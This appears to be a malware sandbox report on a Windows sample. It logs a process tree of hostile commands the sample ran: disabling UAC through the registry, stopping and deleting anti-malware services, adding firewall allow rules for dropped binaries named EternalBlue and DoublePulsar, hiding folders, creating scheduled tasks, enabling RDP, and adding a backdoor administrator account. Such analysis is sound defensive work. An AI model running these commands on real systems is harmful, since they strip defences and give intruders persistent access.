PID 1704 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\programdata\install\ink.exe
PID 1704 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\programdata\install\ink.exe
PID 1704 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\Windows\SysWOW64\cmd.exe
PID 1704 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\Windows\SysWOW64\cmd.exe
PID 1704 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\Windows\SysWOW64\cmd.exe
PID 1704 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\Windows\SysWOW64\cmd.exe
PID 1736 wrote to memory of 1480 N/A C:\ProgramData\Microsoft\Intel\taskhost.exe C:\programdata\microsoft\intel\P.exe
PID 1736 wrote to memory of 1480 N/A C:\ProgramData\Microsoft\Intel\taskhost.exe C:\programdata\microsoft\intel\P.exe
PID 1736 wrote to memory of 1480 N/A C:\ProgramData\Microsoft\Intel\taskhost.exe C:\programdata\microsoft\intel\P.exe
PID 1736 wrote to memory of 1480 N/A C:\ProgramData\Microsoft\Intel\taskhost.exe C:\programdata\microsoft\intel\P.exe
PID 1736 wrote to memory of 1480 N/A C:\ProgramData\Microsoft\Intel\taskhost.exe C:\programdata\microsoft\intel\P.exe
PID 1736 wrote to memory of 1480 N/A C:\ProgramData\Microsoft\Intel\taskhost.exe C:\programdata\microsoft\intel\P.exe
PID 1736 wrote to memory of 1480 N/A C:\ProgramData\Microsoft\Intel\taskhost.exe C:\programdata\microsoft\intel\P.exe
PID 1704 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\Windows\SysWOW64\cmd.exe
PID 1704 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\Windows\SysWOW64\cmd.exe
PID 1704 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\Windows\SysWOW64\cmd.exe
PID 1704 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\Windows\SysWOW64\cmd.exe
PID 1472 wrote to memory of 1620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1472 wrote to memory of 1620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1472 wrote to memory of 1620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1472 wrote to memory of 1620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 552 wrote to memory of 1716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 552 wrote to memory of 1716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 552 wrote to memory of 1716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 552 wrote to memory of 1716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1764 wrote to memory of 1896 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 1764 wrote to memory of 1896 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 1764 wrote to memory of 1896 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 1764 wrote to memory of 1896 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 1764 wrote to memory of 1896 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 1764 wrote to memory of 1896 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 1764 wrote to memory of 1896 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 1896 wrote to memory of 1740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 1896 wrote to memory of 1740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 1896 wrote to memory of 1740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 1896 wrote to memory of 1740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 1704 wrote to memory of 1160 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\Windows\SysWOW64\cmd.exe
PID 1704 wrote to memory of 1160 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\Windows\SysWOW64\cmd.exe
PID 1704 wrote to memory of 1160 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\Windows\SysWOW64\cmd.exe
PID 1704 wrote to memory of 1160 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\Windows\SysWOW64\cmd.exe
PID 1160 wrote to memory of 1476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1160 wrote to memory of 1476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe

System policy modification

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe

"C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe"

C:\ProgramData\Microsoft\Intel\wini.exe

C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui

C:\programdata\install\cheat.exe

C:\programdata\install\cheat.exe -pnaxui

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"

C:\ProgramData\Windows\winit.exe

"C:\ProgramData\Windows\winit.exe"

C:\ProgramData\Microsoft\Intel\taskhost.exe

"C:\ProgramData\Microsoft\Intel\taskhost.exe"

C:\programdata\install\ink.exe

C:\programdata\install\ink.exe

C:\programdata\microsoft\intel\P.exe

C:\programdata\microsoft\intel\P.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc start appidsvc

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc start appmgmt

C:\Windows\SysWOW64\sc.exe

sc start appidsvc

C:\Windows\SysWOW64\sc.exe

sc start appmgmt

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Programdata\Windows\install.bat" "

C:\Windows\SysWOW64\regedit.exe

regedit /s "reg1.reg"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto

C:\Windows\SysWOW64\sc.exe

sc config appidsvc start= auto

C:\Windows\SysWOW64\regedit.exe

regedit /s "reg2.reg"

C:\Windows\SysWOW64\timeout.exe

timeout 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto

C:\Windows\SysWOW64\sc.exe

sc config appmgmt start= auto

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete swprv

C:\Windows\SysWOW64\sc.exe

sc delete swprv

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop mbamservice

C:\Windows\SysWOW64\sc.exe

sc stop mbamservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop bytefenceservice

C:\Windows\SysWOW64\sc.exe

sc stop bytefenceservice

C:\ProgramData\Windows\rutserv.exe

rutserv.exe /silentinstall

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete bytefenceservice

C:\Windows\SysWOW64\sc.exe

sc delete bytefenceservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete mbamservice

C:\Windows\SysWOW64\sc.exe

sc delete mbamservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete crmsvc

C:\Windows\SysWOW64\sc.exe

sc delete crmsvc

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete "windows node"

C:\ProgramData\Windows\rutserv.exe

rutserv.exe /firewall

C:\Windows\SysWOW64\sc.exe

sc delete "windows node"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer

C:\Windows\SysWOW64\sc.exe

sc stop Adobeflashplayer

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop MoonTitle

C:\Windows\SysWOW64\sc.exe

sc delete AdobeFlashPlayer

C:\Windows\SysWOW64\sc.exe

sc stop MoonTitle

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete MoonTitle"

C:\Windows\SysWOW64\sc.exe

sc delete MoonTitle"

C:\ProgramData\Windows\rutserv.exe

C:\ProgramData\Windows\rutserv.exe

C:\ProgramData\Windows\rutserv.exe

rutserv.exe /start

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop AudioServer

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete AudioServer"

C:\Windows\SysWOW64\sc.exe

sc stop AudioServer

C:\Windows\SysWOW64\sc.exe

sc delete AudioServer"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64

C:\Windows\SysWOW64\sc.exe

sc stop clr_optimization_v4.0.30318_64

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"

C:\Windows\SysWOW64\sc.exe

sc delete clr_optimization_v4.0.30318_64"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql

C:\Windows\SysWOW64\sc.exe

sc stop MicrosoftMysql

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall set allprofiles state on

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN

C:\Windows\SysWOW64\sc.exe

sc delete MicrosoftMysql

C:\programdata\microsoft\intel\R8.exe

C:\programdata\microsoft\intel\R8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\rdp\pause.bat" "

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im Rar.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN

C:\ProgramData\Microsoft\Intel\winlog.exe

C:\ProgramData\Microsoft\Intel\winlog.exe -p123

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes

C:\ProgramData\Microsoft\Intel\winlogon.exe

"C:\ProgramData\Microsoft\Intel\winlogon.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FF94.tmp\FF95.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"

C:\ProgramData\Windows\rfusclient.exe

C:\ProgramData\Windows\rfusclient.exe

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes

C:\ProgramData\Windows\rfusclient.exe

C:\ProgramData\Windows\rfusclient.exe /tray

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes

C:\Programdata\RealtekHD\taskhostw.exe

C:\Programdata\RealtekHD\taskhostw.exe

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\Programdata\Windows\*.*

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\Programdata\Windows

C:\Windows\SysWOW64\sc.exe

sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1

C:\Windows\SysWOW64\sc.exe

sc config RManService obj= LocalSystem type= interact type= own

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes

C:\Windows\SysWOW64\sc.exe

sc config RManService DisplayName= "Microsoft Framework"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im Rar.exe

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

cmd /c C:\programdata\microsoft\temp\H.bat

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes

C:\Programdata\WindowsTask\winlogon.exe

C:\Programdata\WindowsTask\winlogon.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /C schtasks /query /fo list

C:\Windows\SysWOW64\schtasks.exe

schtasks /query /fo list

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN

C:\Windows\SysWOW64\cmd.exe

cmd /c C:\programdata\microsoft\temp\Temp.bat

C:\Windows\SysWOW64\timeout.exe

TIMEOUT /T 5 /NOBREAK

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\rdp\Rar.exe

"Rar.exe" e -p555 db.rar

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im Rar.exe

C:\Windows\system32\taskeng.exe

taskeng.exe {8D3E92CE-8DF4-42AF-AC47-B2C46AFF42DA} S-1-5-21-790309383-526510583-3802439154-1000:TVHJCWMH\Admin:Interactive:[1]

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out

C:\Windows\SysWOW64\timeout.exe

timeout 2

C:\ProgramData\Windows\rfusclient.exe

C:\ProgramData\Windows\rfusclient.exe /tray

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)

C:\Programdata\RealtekHD\taskhostw.exe

C:\Programdata\RealtekHD\taskhostw.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ipconfig /flushdns

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)

C:\Windows\system32\ipconfig.exe

ipconfig /flushdns

C:\Windows\SysWOW64\icacls.exe

icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"

C:\Windows\SysWOW64\timeout.exe

timeout 2

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\rdp\bat.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c gpupdate /force

C:\Windows\system32\gpupdate.exe

gpupdate /force

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\icacls.exe

icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\netsh.exe

netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow

C:\Windows\SysWOW64\net.exe

net.exe user "john" "12345" /add

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\timeout.exe

TIMEOUT /T 3 /NOBREAK

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user "john" "12345" /add

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Windows\SysWOW64\net.exe

net localgroup "Администраторы" "John" /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Администраторы" "John" /add

C:\Windows\SysWOW64\net.exe

net localgroup "Administratorzy" "John" /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add

C:\Windows\SysWOW64\net.exe

net localgroup "Administrators" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Administrators" John /add

C:\Windows\SysWOW64\net.exe

net localgroup "Administradores" John /add

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Administradores" John /add

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-288689378-876327943-217641628-191327148614229571531383836086620444591577834264"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\net.exe

net localgroup "Пользователи удаленного рабочего стола" John /add

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\net.exe

net localgroup "Пользователи удаленного управления" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add

